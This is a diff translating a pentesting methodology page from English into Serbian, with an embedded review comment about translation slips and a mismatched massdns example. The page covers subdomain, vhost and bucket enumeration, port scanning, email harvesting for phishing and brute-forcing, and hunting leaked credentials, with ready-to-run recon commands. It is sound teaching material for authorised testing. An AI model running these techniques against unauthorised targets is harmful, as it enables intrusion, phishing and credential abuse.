preuzima poznate URL-ove iz AlienVault-ove Open Threat Exchange, Wayback Machine-a i Common Crawl-a za bilo koju datu domenu. 
```bash # Get subdomains from GAUs found URLs gau --subs tesla.com | cut -d "/" -f 3 | sort -u ``` - -- [**SubDomainizer**](https://github.com/nsonaniya2010/SubDomainizer) **&** [**subscraper**](https://github.com/Cillian-Collins/subscraper): They scrap the web looking for JS files and extract subdomains from there. - +- [**SubDomainizer**](https://github.com/nsonaniya2010/SubDomainizer) **&** [**subscraper**](https://github.com/Cillian-Collins/subscraper): Oni pretražuju web u potrazi za JS datotekama i izvode poddomene iz njih. ```bash # Get only subdomains from SubDomainizer python3 SubDomainizer.py -u https://tesla.com | grep tesla.com 
@@ -351,42 +298,35 @@ python3 SubDomainizer.py -u https://tesla.com | grep tesla.com # Get only subdomains from subscraper, this already perform recursion over the found results python subscraper.py -u tesla.com | grep tesla.com | cut -d " " -f ``` - - [**Shodan**](https://www.shodan.io/) - ```bash # Get info about the domain shodan domain # Get other pages with links to subdomains shodan search "http.html:help.domain.com" ``` - - [**Censys subdomain finder**](https://github.com/christophetd/censys-subdomain-finder) - ```bash export CENSYS_API_ID=... export CENSYS_API_SECRET=... python3 censys-subdomain-finder.py tesla.com ``` - - [**DomainTrail.py**](https://github.com/gatete/DomainTrail) - ```bash python3 DomainTrail.py -d example.com ``` - -- [**securitytrails.com**](https://securitytrails.com/) has a free API to search for subdomains and IP history +- [**securitytrails.com**](https://securitytrails.com/) ima besplatan API za pretragu subdomena i istoriju IP adresa - [**chaos.projectdiscovery.io**](https://chaos.projectdiscovery.io/#/) -This project offers for **free all the subdomains related to bug-bounty programs**. You can access this data also using [chaospy](https://github.com/dr-0x0x/chaospy) or even access the scope used by this project [https://github.com/projectdiscovery/chaos-public-program-list](https://github.com/projectdiscovery/chaos-public-program-list) +Ovaj projekat nudi **besplatno sve subdomene povezane sa bug-bounty programima**. 
Ove podatke možete pristupiti i koristeći [chaospy](https://github.com/dr-0x0x/chaospy) ili čak pristupiti opsegu koji koristi ovaj projekat [https://github.com/projectdiscovery/chaos-public-program-list](https://github.com/projectdiscovery/chaos-public-program-list) -You can find a **comparison** of many of these tools here: [https://blog.blacklanternsecurity.com/p/subdomain-enumeration-tool-face-off](https://blog.blacklanternsecurity.com/p/subdomain-enumeration-tool-face-off) +Možete pronaći **uporedbu** mnogih od ovih alata ovde: [https://blog.blacklanternsecurity.com/p/subdomain-enumeration-tool-face-off](https://blog.blacklanternsecurity.com/p/subdomain-enumeration-tool-face-off) ### **DNS Brute force** -Let's try to find new **subdomains** brute-forcing DNS servers using possible subdomain names. +Pokušajmo da pronađemo nove **subdomene** brute-forcing DNS servere koristeći moguće nazive subdomena. -For this action you will need some **common subdomains wordlists like**: +Za ovu akciju biće vam potrebne neke **uobičajene liste reči za subdomene kao što su**: - [https://gist.github.com/jhaddix/86a06c5dc309d08580a018c66354a056](https://gist.github.com/jhaddix/86a06c5dc309d08580a018c66354a056) - [https://wordlists-cdn.assetnote.io/data/manual/best-dns-wordlist.txt](https://wordlists-cdn.assetnote.io/data/manual/best-dns-wordlist.txt) 
@@ -394,118 +334,93 @@ For this action you will need some **common subdomains wordlists like**: - [https://github.com/pentester-io/commonspeak](https://github.com/pentester-io/commonspeak) - [https://github.com/danielmiessler/SecLists/tree/master/Discovery/DNS](https://github.com/danielmiessler/SecLists/tree/master/Discovery/DNS) -And also IPs of good DNS resolvers. In order to generate a list of trusted DNS resolvers you can download the resolvers from [https://public-dns.info/nameservers-all.txt](https://public-dns.info/nameservers-all.txt) and use [**dnsvalidator**](https://github.com/vortexau/dnsvalidator) to filter them. Or you could use: [https://raw.githubusercontent.com/trickest/resolvers/main/resolvers-trusted.txt](https://raw.githubusercontent.com/trickest/resolvers/main/resolvers-trusted.txt) +Takođe, IP adrese dobrih DNS resolvera. Da biste generisali listu pouzdanih DNS resolvera, možete preuzeti resolvere sa [https://public-dns.info/nameservers-all.txt](https://public-dns.info/nameservers-all.txt) i koristiti [**dnsvalidator**](https://github.com/vortexau/dnsvalidator) da ih filtrirate. Ili možete koristiti: [https://raw.githubusercontent.com/trickest/resolvers/main/resolvers-trusted.txt](https://raw.githubusercontent.com/trickest/resolvers/main/resolvers-trusted.txt) -The most recommended tools for DNS brute-force are: - -- [**massdns**](https://github.com/blechschmidt/massdns): This was the first tool that performed an effective DNS brute-force. It's very fast however it's prone to false positives. +Najpreporučivaniji alati za DNS brute-force su: +- [**massdns**](https://github.com/blechschmidt/massdns): Ovo je bio prvi alat koji je efikasno izvršavao DNS brute-force. Veoma je brz, međutim sklon je lažnim pozitivnim rezultatima. ```bash sed 's/$/.domain.com/' subdomains.txt > bf-subdomains.txt ./massdns -r resolvers.txt -w /tmp/results.txt bf-subdomains.txt grep -E "tesla.com. 
[0-9]+ IN A .+" /tmp/results.txt ``` - -- [**gobuster**](https://github.com/OJ/gobuster): This one I think just uses 1 resolver - +- [**gobuster**](https://github.com/OJ/gobuster): Mislim da koristi samo 1 resolver. ``` gobuster dns -d mysite.com -t 50 -w subdomains.txt ``` - -- [**shuffledns**](https://github.com/projectdiscovery/shuffledns) is a wrapper around `massdns`, written in go, that allows you to enumerate valid subdomains using active bruteforce, as well as resolve subdomains with wildcard handling and easy input-output support. - +- [**shuffledns**](https://github.com/projectdiscovery/shuffledns) je omotač oko `massdns`, napisan u go, koji vam omogućava da enumerišete validne poddomene koristeći aktivni bruteforce, kao i da rešavate poddomene sa obradom wildcard-a i jednostavnom podrškom za ulaz-izlaz. ``` shuffledns -d example.com -list example-subdomains.txt -r resolvers.txt ``` - -- [**puredns**](https://github.com/d3mondev/puredns): It also uses `massdns`. - +- [**puredns**](https://github.com/d3mondev/puredns): Takođe koristi `massdns`. ``` puredns bruteforce all.txt domain.com ``` - -- [**aiodnsbrute**](https://github.com/blark/aiodnsbrute) uses asyncio to brute force domain names asynchronously. - +- [**aiodnsbrute**](https://github.com/blark/aiodnsbrute) koristi asyncio za asinkrono brute force napad na imena domena. ``` aiodnsbrute -r resolvers -w wordlist.txt -vv -t 1024 domain.com ``` +### Druga runda DNS brute-force -### Second DNS Brute-Force Round - -After having found subdomains using open sources and brute-forcing, you could generate alterations of the subdomains found to try to find even more. Several tools are useful for this purpose: - -- [**dnsgen**](https://github.com/ProjectAnte/dnsgen)**:** Given the domains and subdomains generate permutations. +Nakon što ste pronašli poddomene koristeći otvorene izvore i brute-forcing, možete generisati varijacije pronađenih poddomena kako biste pokušali da pronađete još više. 
Nekoliko alata je korisno za ovu svrhu: +- [**dnsgen**](https://github.com/ProjectAnte/dnsgen)**:** Dajući domene i poddomene generiše permutacije. ```bash cat subdomains.txt | dnsgen - ``` - -- [**goaltdns**](https://github.com/subfinder/goaltdns): Given the domains and subdomains generate permutations. - - You can get goaltdns permutations **wordlist** in [**here**](https://github.com/subfinder/goaltdns/blob/master/words.txt). - +- [**goaltdns**](https://github.com/subfinder/goaltdns): Dati domene i poddomene generišite permutacije. +- Možete dobiti goaltdns permutacije **wordlist** **ovde** [**here**](https://github.com/subfinder/goaltdns/blob/master/words.txt). ```bash goaltdns -l subdomains.txt -w /tmp/words-permutations.txt -o /tmp/final-words-s3.txt ``` - -- [**gotator**](https://github.com/Josue87/gotator)**:** Given the domains and subdomains generate permutations. If not permutations file is indicated gotator will use its own one. - +- [**gotator**](https://github.com/Josue87/gotator)**:** Dati domene i poddomene generiše permutacije. Ako nije naznačen fajl sa permutacijama, gotator će koristiti svoj. ``` gotator -sub subdomains.txt -silent [-perm /tmp/words-permutations.txt] ``` - -- [**altdns**](https://github.com/infosec-au/altdns): Apart from generating subdomains permutations, it can also try to resolve them (but it's better to use the previous commented tools). - - You can get altdns permutations **wordlist** in [**here**](https://github.com/infosec-au/altdns/blob/master/words.txt). - +- [**altdns**](https://github.com/infosec-au/altdns): Osim generisanja permutacija poddomena, može pokušati i da ih reši (ali je bolje koristiti prethodno pomenute alate). +- Možete dobiti altdns permutacije **wordlist** u [**ovde**](https://github.com/infosec-au/altdns/blob/master/words.txt). 
``` altdns -i subdomains.txt -w /tmp/words-permutations.txt -o /tmp/asd3 ``` - -- [**dmut**](https://github.com/bp0lr/dmut): Another tool to perform permutations, mutations and alteration of subdomains. This tool will brute force the result (it doesn't support dns wild card). - - You can get dmut permutations wordlist in [**here**](https://raw.githubusercontent.com/bp0lr/dmut/main/words.txt). - +- [**dmut**](https://github.com/bp0lr/dmut): Još jedan alat za izvođenje permutacija, mutacija i izmena poddomena. Ovaj alat će izvršiti brute force na rezultat (ne podržava dns wild card). +- Možete dobiti dmut permutacije rečnik [**ovde**](https://raw.githubusercontent.com/bp0lr/dmut/main/words.txt). ```bash cat subdomains.txt | dmut -d /tmp/words-permutations.txt -w 100 \ - --dns-errorLimit 10 --use-pb --verbose -s /tmp/resolvers-trusted.txt +--dns-errorLimit 10 --use-pb --verbose -s /tmp/resolvers-trusted.txt ``` +- [**alterx**](https://github.com/projectdiscovery/alterx)**:** Na osnovu domena **generiše nova potencijalna imena poddomena** na osnovu naznačenih obrazaca kako bi pokušao da otkrije više poddomena. -- [**alterx**](https://github.com/projectdiscovery/alterx)**:** Based on a domain it **generates new potential subdomains names** based on indicated patterns to try to discover more subdomains. - -#### Smart permutations generation - -- [**regulator**](https://github.com/cramppet/regulator): For more info read this [**post**](https://cramppet.github.io/regulator/index.html) but it will basically get the **main parts** from the **discovered subdomains** and will mix them to find more subdomains. +#### Pametna generacija permutacija +- [**regulator**](https://github.com/cramppet/regulator): Za više informacija pročitajte ovaj [**post**](https://cramppet.github.io/regulator/index.html), ali će u suštini uzeti **glavne delove** iz **otkrivenih poddomena** i mešati ih kako bi pronašao više poddomena. 
```bash python3 main.py adobe.com adobe adobe.rules make_brute_list.sh adobe.rules adobe.brute puredns resolve adobe.brute --write adobe.valid ``` - -- [**subzuf**](https://github.com/elceef/subzuf)**:** _subzuf_ is a subdomain brute-force fuzzer coupled with an immensly simple but effective DNS reponse-guided algorithm. It utilizes a provided set of input data, like a tailored wordlist or historical DNS/TLS records, to accurately synthesize more corresponding domain names and expand them even further in a loop based on information gathered during DNS scan. - +- [**subzuf**](https://github.com/elceef/subzuf)**:** _subzuf_ je fuzzer za brute-force subdomena uparen sa izuzetno jednostavnim, ali efikasnim algoritmom vođenim DNS odgovorima. Koristi pruženi skup ulaznih podataka, kao što su prilagođena lista reči ili istorijski DNS/TLS zapisi, da precizno sintetiše više odgovarajućih imena domena i dodatno ih proširuje u petlji na osnovu informacija prikupljenih tokom DNS skeniranja. ``` echo www | subzuf facebook.com ``` +### **Workflow za Otkriće Poddomena** -### **Subdomain Discovery Workflow** - -Check this blog post I wrote about how to **automate the subdomain discovery** from a domain using **Trickest workflows** so I don't need to launch manually a bunch of tools in my computer: +Pogledajte ovaj blog post koji sam napisao o tome kako da **automatizujem otkrivanje poddomena** sa domena koristeći **Trickest workflows** tako da ne moram ručno da pokrećem gomilu alata na svom računaru: {% embed url="https://trickest.com/blog/full-subdomain-discovery-using-workflow/" %} {% embed url="https://trickest.com/blog/full-subdomain-brute-force-discovery-using-workflow/" %} -### **VHosts / Virtual Hosts** +### **VHosts / Virtuelni Hostovi** -If you found an IP address containing **one or several web pages** belonging to subdomains, you could try to **find other subdomains with webs in that IP** by looking in **OSINT sources** for domains in an IP or by **brute-forcing VHost 
domain names in that IP**. +Ako ste pronašli IP adresu koja sadrži **jednu ili više web stranica** koje pripadaju poddomenima, možete pokušati da **pronađete druge poddomene sa web stranicama na toj IP adresi** tražeći u **OSINT izvorima** za domene na IP-u ili **brute-forcing VHost imena domena na toj IP adresi**. #### OSINT -You can find some **VHosts in IPs using** [**HostHunter**](https://github.com/SpiderLabs/HostHunter) **or other APIs**. +Možete pronaći neke **VHost-ove na IP-ovima koristeći** [**HostHunter**](https://github.com/SpiderLabs/HostHunter) **ili druge API-je**. **Brute Force** -If you suspect that some subdomain can be hidden in a web server you could try to brute force it: - +Ako sumnjate da neki poddomen može biti skriven na web serveru, možete pokušati da ga brute-forcujete: ```bash ffuf -c -w /path/to/wordlist -u http://victim.com -H "Host: FUZZ.victim.com" 
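Review bot: the goaltdns bullet in this hunk ends up with a duplicated, half-translated link: „Možete dobiti goaltdns permutacije **wordlist** **ovde** [**here**](...)" keeps the English link text and adds a stray bold „ovde" in front of it, whereas the altdns and dmut bullets just below get it right with „[**ovde**](...)"; the goaltdns line should match them. While the massdns block is being touched, its example is internally inconsistent in both the old and the new text: the sed line appends „.domain.com" but the grep filters on „tesla.com.", so anyone who copies the three commands gets no matches; use one domain in both. Terminology also drifts inside the hunk: the subzuf paragraph says „subdomena" while dnsgen, goaltdns, gotator, regulator and the shuffledns paragraph say „poddomene", and in the altdns bullet „da ih reši" means „solve" rather than DNS-resolve („razreši"); pick one term and use it throughout the page.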
@@ -519,207 +434,196 @@ vhostbrute.py --url="example.com" --remoteip="10.1.1.15" --base="www.example.com #https://github.com/codingo/VHostScan VHostScan -t example.com ``` - > [!NOTE] -> With this technique you may even be able to access internal/hidden endpoints. +> Ovom tehnikom možda ćete moći da pristupite internim/skrivenim krajnjim tačkama. ### **CORS Brute Force** -Sometimes you will find pages that only return the header _**Access-Control-Allow-Origin**_ when a valid domain/subdomain is set in the _**Origin**_ header. In these scenarios, you can abuse this behaviour to **discover** new **subdomains**. - +Ponekad ćete naići na stranice koje vraćaju samo zaglavlje _**Access-Control-Allow-Origin**_ kada je validna domena/subdomena postavljena u _**Origin**_ zaglavlju. U ovim scenarijima, možete zloupotrebiti ovo ponašanje da **otkrijete** nove **subdomene**. ```bash ffuf -w subdomains-top1million-5000.txt -u http://10.10.10.208 -H 'Origin: http://FUZZ.crossfit.htb' -mr "Access-Control-Allow-Origin" -ignore-body ``` +### **Brute Force za Buckete** -### **Buckets Brute Force** +Dok tražite **subdomene**, obratite pažnju da li se **upučuju** na bilo koju vrstu **bucketa**, i u tom slučaju [**proverite dozvole**](../../network-services-pentesting/pentesting-web/buckets/)**.**\ +Takođe, kako ćete u ovom trenutku znati sve domene unutar opsega, pokušajte da [**brute force-ujete moguće nazive bucketa i proverite dozvole**](../../network-services-pentesting/pentesting-web/buckets/). -While looking for **subdomains** keep an eye to see if it is **pointing** to any type of **bucket**, and in that case [**check the permissions**](../../network-services-pentesting/pentesting-web/buckets/)**.**\ -Also, as at this point you will know all the domains inside the scope, try to [**brute force possible bucket names and check the permissions**](../../network-services-pentesting/pentesting-web/buckets/). 
+### **Monitorisanje** -### **Monitorization** +Možete **monitorisati** da li su **nove subdomene** domena kreirane praćenjem **Certificate Transparency** logova [**sublert** ](https://github.com/yassineaboukir/sublert/blob/master/sublert.py)to radi. -You can **monitor** if **new subdomains** of a domain are created by monitoring the **Certificate Transparency** Logs [**sublert** ](https://github.com/yassineaboukir/sublert/blob/master/sublert.py)does. +### **Traženje ranjivosti** -### **Looking for vulnerabilities** +Proverite moguće [**preuzimanje subdomena**](../../pentesting-web/domain-subdomain-takeover.md#subdomain-takeover).\ +Ako se **subdomena** upućuje na neki **S3 bucket**, [**proverite dozvole**](../../network-services-pentesting/pentesting-web/buckets/). -Check for possible [**subdomain takeovers**](../../pentesting-web/domain-subdomain-takeover.md#subdomain-takeover).\ -If the **subdomain** is pointing to some **S3 bucket**, [**check the permissions**](../../network-services-pentesting/pentesting-web/buckets/). +Ako pronađete bilo koju **subdomenu sa IP-om koji se razlikuje** od onih koje ste već pronašli u otkrivanju resursa, trebali biste izvršiti **osnovno skeniranje ranjivosti** (koristeći Nessus ili OpenVAS) i neko [**skeniranje portova**](../pentesting-network/#discovering-hosts-from-the-outside) sa **nmap/masscan/shodan**. U zavisnosti od toga koji servisi rade, možete pronaći u **ovoj knjizi neke trikove za "napad" na njih**.\ +&#xNAN;_Note da ponekad subdomena je hostovana unutar IP-a koji nije pod kontrolom klijenta, tako da nije u opsegu, budite oprezni._ -If you find any **subdomain with an IP different** from the ones you already found in the assets discovery, you should perform a **basic vulnerability scan** (using Nessus or OpenVAS) and some [**port scan**](../pentesting-network/#discovering-hosts-from-the-outside) with **nmap/masscan/shodan**. 
Depending on which services are running you can find in **this book some tricks to "attack" them**.\ -&#xNAN;_Note that sometimes the subdomain is hosted inside an IP that is not controlled by the client, so it's not in the scope, be careful._ +## IP-ovi -## IPs +U početnim koracima možda ste **pronašli neke IP opsege, domene i subdomene**.\ +Sada je vreme da **prikupite sve IP-ove iz tih opsega** i za **domene/subdomene (DNS upiti).** -In the initial steps you might have **found some IP ranges, domains and subdomains**.\ -It’s time to **recollect all the IPs from those ranges** and for the **domains/subdomains (DNS queries).** - -Using services from the following **free apis** you can also find **previous IPs used by domains and subdomains**. These IPs might still be owned by the client (and might allow you to find [**CloudFlare bypasses**](../../network-services-pentesting/pentesting-web/uncovering-cloudflare.md)) +Koristeći usluge iz sledećih **besplatnih API-ja** možete takođe pronaći **prethodne IP-ove korišćene od strane domena i subdomena**. Ovi IP-ovi možda još uvek pripadaju klijentu (i mogu vam omogućiti da pronađete [**CloudFlare zaobilaženja**](../../network-services-pentesting/pentesting-web/uncovering-cloudflare.md)) - [**https://securitytrails.com/**](https://securitytrails.com/) -You can also check for domains pointing a specific IP address using the tool [**hakip2host**](https://github.com/hakluke/hakip2host) +Takođe možete proveriti za domene koje upućuju na određenu IP adresu koristeći alat [**hakip2host**](https://github.com/hakluke/hakip2host) -### **Looking for vulnerabilities** +### **Traženje ranjivosti** -**Port scan all the IPs that doesn’t belong to CDNs** (as you highly probably won’t find anything interested in there). In the running services discovered you might be **able to find vulnerabilities**. +**Skenirajte sve IP-ove koji ne pripadaju CDN-ima** (jer verovatno nećete pronaći ništa zanimljivo tamo). 
U otkrivenim servisima možda ćete **moći da pronađete ranjivosti**. -**Find a** [**guide**](../pentesting-network/) **about how to scan hosts.** +**Pronađite** [**vodič**](../pentesting-network/) **o tome kako skenirati hostove.** -## Web servers hunting +## Lov na web servere -> We have found all the companies and their assets and we know IP ranges, domains and subdomains inside the scope. It's time to search for web servers. +> Pronašli smo sve kompanije i njihove resurse i znamo IP opsege, domene i subdomene unutar opsega. Sada je vreme da tražimo web servere. -In the previous steps you have probably already performed some **recon of the IPs and domains discovered**, so you may have **already found all the possible web servers**. However, if you haven't we are now going to see some **fast tricks to search for web servers** inside the scope. +U prethodnim koracima verovatno ste već izvršili neku **recon za IP-ove i domene koje ste otkrili**, tako da ste možda **već pronašli sve moguće web servere**. Međutim, ako niste, sada ćemo videti neke **brze trikove za pretragu web servera** unutar opsega. -Please, note that this will be **oriented for web apps discovery**, so you should **perform the vulnerability** and **port scanning** also (**if allowed** by the scope). - -A **fast method** to discover **ports open** related to **web** servers using [**masscan** can be found here](../pentesting-network/#http-port-discovery).\ -Another friendly tool to look for web servers is [**httprobe**](https://github.com/tomnomnom/httprobe)**,** [**fprobe**](https://github.com/theblackturtle/fprobe) and [**httpx**](https://github.com/projectdiscovery/httpx). You just pass a list of domains and it will try to connect to port 80 (http) and 443 (https). 
Additionally, you can indicate to try other ports: +Molimo vas da napomenete da će ovo biti **orijentisano na otkrivanje web aplikacija**, tako da biste trebali **izvršiti skeniranje ranjivosti** i **skeniranje portova** takođe (**ako je dozvoljeno** od strane opsega). +**Brza metoda** za otkrivanje **otvorenih portova** povezanih sa **web** serverima koristeći [**masscan** može se pronaći ovde](../pentesting-network/#http-port-discovery).\ +Još jedan prijateljski alat za pretragu web servera je [**httprobe**](https://github.com/tomnomnom/httprobe)**,** [**fprobe**](https://github.com/theblackturtle/fprobe) i [**httpx**](https://github.com/projectdiscovery/httpx). Samo prosledite listu domena i pokušaće da se poveže na port 80 (http) i 443 (https). Pored toga, možete naznačiti da pokušate druge portove: ```bash cat /tmp/domains.txt | httprobe #Test all domains inside the file for port 80 and 443 cat /tmp/domains.txt | httprobe -p http:8080 -p https:8443 #Check port 80, 443 and 8080 and 8443 ``` - ### **Screenshots** -Now that you have discovered **all the web servers** present in the scope (among the **IPs** of the company and all the **domains** and **subdomains**) you probably **don't know where to start**. So, let's make it simple and start just taking screenshots of all of them. Just by **taking a look** at the **main page** you can find **weird** endpoints that are more **prone** to be **vulnerable**. +Sada kada ste otkrili **sve web servere** prisutne u opsegu (među **IP-ovima** kompanije i svim **domenima** i **poddomenama**) verovatno **ne znate odakle da počnete**. Dakle, hajde da to pojednostavimo i počnemo tako što ćemo praviti snimke ekrana svih njih. Samo gledajući **glavnu stranicu** možete pronaći **čudne** krajnje tačke koje su više **podložne** da budu **ranjive**. 
-To perform the proposed idea you can use [**EyeWitness**](https://github.com/FortyNorthSecurity/EyeWitness), [**HttpScreenshot**](https://github.com/breenmachine/httpscreenshot), [**Aquatone**](https://github.com/michenriksen/aquatone), [**Shutter**](https://shutter-project.org/downloads/third-party-packages/), [**Gowitness**](https://github.com/sensepost/gowitness) or [**webscreenshot**](https://github.com/maaaaz/webscreenshot)**.** +Da biste sproveli predloženu ideju, možete koristiti [**EyeWitness**](https://github.com/FortyNorthSecurity/EyeWitness), [**HttpScreenshot**](https://github.com/breenmachine/httpscreenshot), [**Aquatone**](https://github.com/michenriksen/aquatone), [**Shutter**](https://shutter-project.org/downloads/third-party-packages/), [**Gowitness**](https://github.com/sensepost/gowitness) ili [**webscreenshot**](https://github.com/maaaaz/webscreenshot)**.** -Moreover, you could then use [**eyeballer**](https://github.com/BishopFox/eyeballer) to run over all the **screenshots** to tell you **what's likely to contain vulnerabilities**, and what isn't. +Pored toga, možete koristiti [**eyeballer**](https://github.com/BishopFox/eyeballer) da pregledate sve **screenshotove** i kažete vam **šta verovatno sadrži ranjivosti**, a šta ne. -## Public Cloud Assets +## Javni Cloud Resursi -In order to find potential cloud assets belonging to a company you should **start with a list of keywords that identify that company**. For example, a crypto for a crypto company you might use words such as: `"crypto", "wallet", "dao", "", <"subdomain_names">`. +Da biste pronašli potencijalne cloud resurse koji pripadaju kompaniji, trebali biste **početi sa listom ključnih reči koje identifikuju tu kompaniju**. Na primer, za kripto kompaniju možete koristiti reči kao što su: `"crypto", "wallet", "dao", "", <"subdomain_names">`. 
-You will also need wordlists of **common words used in buckets**: +Takođe će vam biti potrebne liste reči **uobičajenih reči korišćenih u kanticama**: - [https://raw.githubusercontent.com/cujanovic/goaltdns/master/words.txt](https://raw.githubusercontent.com/cujanovic/goaltdns/master/words.txt) - [https://raw.githubusercontent.com/infosec-au/altdns/master/words.txt](https://raw.githubusercontent.com/infosec-au/altdns/master/words.txt) - [https://raw.githubusercontent.com/jordanpotti/AWSBucketDump/master/BucketNames.txt](https://raw.githubusercontent.com/jordanpotti/AWSBucketDump/master/BucketNames.txt) -Then, with those words you should generate **permutations** (check the [**Second Round DNS Brute-Force**](./#second-dns-bruteforce-round) for more info). +Zatim, sa tim rečima trebali biste generisati **permutacije** (proverite [**Drugu rundu DNS Brute-Force**](./#second-dns-bruteforce-round) za više informacija). -With the resulting wordlists you could use tools such as [**cloud_enum**](https://github.com/initstring/cloud_enum)**,** [**CloudScraper**](https://github.com/jordanpotti/CloudScraper)**,** [**cloudlist**](https://github.com/projectdiscovery/cloudlist) **or** [**S3Scanner**](https://github.com/sa7mon/S3Scanner)**.** +Sa dobijenim listama reči možete koristiti alate kao što su [**cloud_enum**](https://github.com/initstring/cloud_enum)**,** [**CloudScraper**](https://github.com/jordanpotti/CloudScraper)**,** [**cloudlist**](https://github.com/projectdiscovery/cloudlist) **ili** [**S3Scanner**](https://github.com/sa7mon/S3Scanner)**.** -Remember that when looking for Cloud Assets you should l**ook for more than just buckets in AWS**. +Zapamtite da kada tražite Cloud Resurse, trebali biste **gledati više od samo kanti u AWS-u**. -### **Looking for vulnerabilities** +### **Traženje ranjivosti** -If you find things such as **open buckets or cloud functions exposed** you should **access them** and try to see what they offer you and if you can abuse them. 
+Ako pronađete stvari kao što su **otvorene kante ili izložene cloud funkcije**, trebali biste **pristupiti njima** i pokušati da vidite šta vam nude i da li ih možete zloupotrebiti. -## Emails +## Emailovi -With the **domains** and **subdomains** inside the scope you basically have all what you **need to start searching for emails**. These are the **APIs** and **tools** that have worked the best for me to find emails of a company: +Sa **domenima** i **poddomenama** unutar opsega, u suštini imate sve što vam **treba da počnete da tražite emailove**. Ovo su **API-ji** i **alati** koji su mi najbolje radili za pronalaženje emailova kompanije: -- [**theHarvester**](https://github.com/laramies/theHarvester) - with APIs -- API of [**https://hunter.io/**](https://hunter.io/) (free version) -- API of [**https://app.snov.io/**](https://app.snov.io/) (free version) -- API of [**https://minelead.io/**](https://minelead.io/) (free version) +- [**theHarvester**](https://github.com/laramies/theHarvester) - sa API-ima +- API [**https://hunter.io/**](https://hunter.io/) (besplatna verzija) +- API [**https://app.snov.io/**](https://app.snov.io/) (besplatna verzija) +- API [**https://minelead.io/**](https://minelead.io/) (besplatna verzija) -### **Looking for vulnerabilities** +### **Traženje ranjivosti** -Emails will come handy later to **brute-force web logins and auth services** (such as SSH). Also, they are needed for **phishings**. Moreover, these APIs will give you even more **info about the person** behind the email, which is useful for the phishing campaign. +Emailovi će biti korisni kasnije za **brute-force web prijave i auth servise** (kao što je SSH). Takođe, potrebni su za **phishing**. Pored toga, ovi API-ji će vam dati još više **informacija o osobi** iza emaila, što je korisno za phishing kampanju. 
-## Credential Leaks +## Curjenje Akreditiva -With the **domains,** **subdomains**, and **emails** you can start looking for credentials leaked in the past belonging to those emails: +Sa **domenima,** **poddomenama** i **emailovima** možete početi da tražite akreditive koji su procurili u prošlosti i koji pripadaju tim emailovima: - [https://leak-lookup.com](https://leak-lookup.com/account/login) - [https://www.dehashed.com/](https://www.dehashed.com/) -### **Looking for vulnerabilities** +### **Traženje ranjivosti** -If you find **valid leaked** credentials, this is a very easy win. +Ako pronađete **validne procurene** akreditive, ovo je vrlo lakša pobeda. -## Secrets Leaks +## Curenje Tajni -Credential leaks are related to hacks of companies where **sensitive information was leaked and sold**. However, companies might be affected for **other leaks** whose info isn't in those databases: +Curenje akreditiva je povezano sa hakovanjem kompanija gde je **osetljive informacije procurile i prodane**. Međutim, kompanije mogu biti pogođene i **drugim curenjima** čije informacije nisu u tim bazama podataka: -### Github Leaks +### Github Curjenja -Credentials and APIs might be leaked in the **public repositories** of the **company** or of the **users** working by that github company.\ -You can use the **tool** [**Leakos**](https://github.com/carlospolop/Leakos) to **download** all the **public repos** of an **organization** and of its **developers** and run [**gitleaks**](https://github.com/zricethezav/gitleaks) over them automatically. +Akreditivi i API-ji mogu biti procureni u **javnim repozitorijumima** **kompanije** ili **korisnika** koji rade za tu github kompaniju.\ +Možete koristiti **alat** [**Leakos**](https://github.com/carlospolop/Leakos) da **preuzmete** sve **javne repoe** jedne **organizacije** i njenih **razvijača** i automatski pokrenete [**gitleaks**](https://github.com/zricethezav/gitleaks) nad njima. 
-**Leakos** can also be used to run **gitleaks** agains all the **text** provided **URLs passed** to it as sometimes **web pages also contains secrets**. +**Leakos** se takođe može koristiti za pokretanje **gitleaks** protiv svih **tekstova** koji su **URL-ovi prosleđeni** njemu, jer ponekad **web stranice takođe sadrže tajne**. #### Github Dorks -Check also this **page** for potential **github dorks** you could also search for in the organization you are attacking: +Proverite takođe ovu **stranicu** za potencijalne **github dorks** koje takođe možete pretraživati u organizaciji koju napadate: {{#ref}} github-leaked-secrets.md {{#endref}} -### Pastes Leaks +### Curenja Paste -Sometimes attackers or just workers will **publish company content in a paste site**. This might or might not contain **sensitive information**, but it's very interesting to search for it.\ -You can use the tool [**Pastos**](https://github.com/carlospolop/Pastos) to search in more that 80 paste sites at the same time. +Ponekad napadači ili samo radnici će **objaviti sadržaj kompanije na paste sajtu**. Ovo može ili ne mora sadržati **osetljive informacije**, ali je veoma zanimljivo tražiti to.\ +Možete koristiti alat [**Pastos**](https://github.com/carlospolop/Pastos) da pretražujete na više od 80 paste sajtova u isto vreme. ### Google Dorks -Old but gold google dorks are always useful to find **exposed information that shouldn't be there**. The only problem is that the [**google-hacking-database**](https://www.exploit-db.com/google-hacking-database) contains several **thousands** of possible queries that you cannot run manually. So, you can get your favourite 10 ones or you could use a **tool such as** [**Gorks**](https://github.com/carlospolop/Gorks) **to run them all**. +Stari, ali zlatni google dorks su uvek korisni za pronalaženje **izloženih informacija koje ne bi trebale biti tu**. 
Jedini problem je što [**google-hacking-database**](https://www.exploit-db.com/google-hacking-database) sadrži nekoliko **hiljada** mogućih upita koje ne možete ručno pokrenuti. Dakle, možete uzeti svojih omiljenih 10 ili možete koristiti **alat kao što je** [**Gorks**](https://github.com/carlospolop/Gorks) **da ih sve pokrenete**. -_Note that the tools that expect to run all the database using the regular Google browser will never end as google will block you very very soon._ +_Napomena da alati koji očekuju da pokrenu celu bazu koristeći regularni Google pretraživač nikada neće završiti jer će vas google vrlo brzo blokirati._ -### **Looking for vulnerabilities** +### **Traženje ranjivosti** -If you find **valid leaked** credentials or API tokens, this is a very easy win. +Ako pronađete **validne procurene** akreditive ili API tokene, ovo je vrlo laka pobeda. -## Public Code Vulnerabilities +## Javne Ranjivosti Koda -If you found that the company has **open-source code** you can **analyse** it and search for **vulnerabilities** on it. +Ako ste otkrili da kompanija ima **open-source kod**, možete ga **analizirati** i tražiti **ranjivosti** u njemu. 
